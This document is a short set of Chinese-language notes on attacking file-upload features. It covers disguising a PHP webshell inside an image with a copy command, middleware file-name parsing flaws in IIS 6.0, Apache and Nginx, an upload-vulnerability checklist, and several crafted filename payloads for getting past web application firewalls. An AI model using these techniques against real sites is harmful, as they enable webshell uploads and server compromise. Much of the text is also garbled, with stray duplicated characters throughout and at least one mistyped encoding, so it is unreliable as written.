1. 圖片一句話木馬

copy 1.png /b + shell.php /a webshell.jpg

2. 中間件解析漏洞

image.png

• iis6.0的特點(diǎn)：
  文件夾形式：image.asp/qq.jpg的話，qq.jpg就會(huì)被當(dāng)成asp文件進(jìn)行執(zhí)行
  文件形式：image.asp;.jpg或者xxx.asp;xxx.jpg此文件會(huì)被當(dāng)成asp文件執(zhí)行，而且asp也可以換成PHP
• Apache 解析漏洞-低版本
  2.php.xxx 會(huì)從右到左一直到可以解析的后綴進(jìn)行解析
  換行解析漏洞 在.php%oa會(huì)被解析為PHP文件
• NGINX解析漏洞
  nginx 1.x php 7.x 版本: 在圖片地址如 1.png后添加任意 不存在的php文件, 圖片將會(huì)被解析為php, 如 1.png/xxx.php
  nginx文件名解析漏洞,
  
  image.png

上傳1.gif(空格)=>抓包修改文件名的十六進(jìn)制數(shù)據(jù)1.gif[0x20] [0x00]=>訪問(wèn)上傳的文件地址1.gif[0x20][0x00].php

3. 文件上傳漏洞總結(jié)

1. 查看中間件，是否存在解析漏洞（iis/apache/nginx）
2. 文件上傳漏洞點(diǎn)的識(shí)別
   字典掃描路徑，會(huì)員中心，更換頭像等等
3. 文件上傳漏洞分類(lèi)（代碼層面）
   黑名單，白名單，文件內(nèi)容/類(lèi)型及其它
4. 查看是否是CMS漏洞
5. 查找是否存在編輯器
6. 查找是否有相關(guān)的CVE漏洞

4.waf繞過(guò)

• 數(shù)據(jù)溢出-防匹配(xxx...)
• 符號(hào)變異-防匹配（' " ;）

filename=x.php
filename="x.php
filename='x.php
filename=x.php
filename="a.jpg;.php";

• 數(shù)據(jù)截?cái)?防匹配(%00 換行 空格 )

filename="a.php%00.jpg"
filename="Content-Disposition : form-data;name="upload_file" ; x.php"
filename="x.jpg" ; filename="x.jpg" ; . . . ..filename="x.php";
//換行繞過(guò)
filename=
"
x
.
p
h
p
"
;

• 重復(fù)數(shù)據(jù)-防匹配(參數(shù)多次)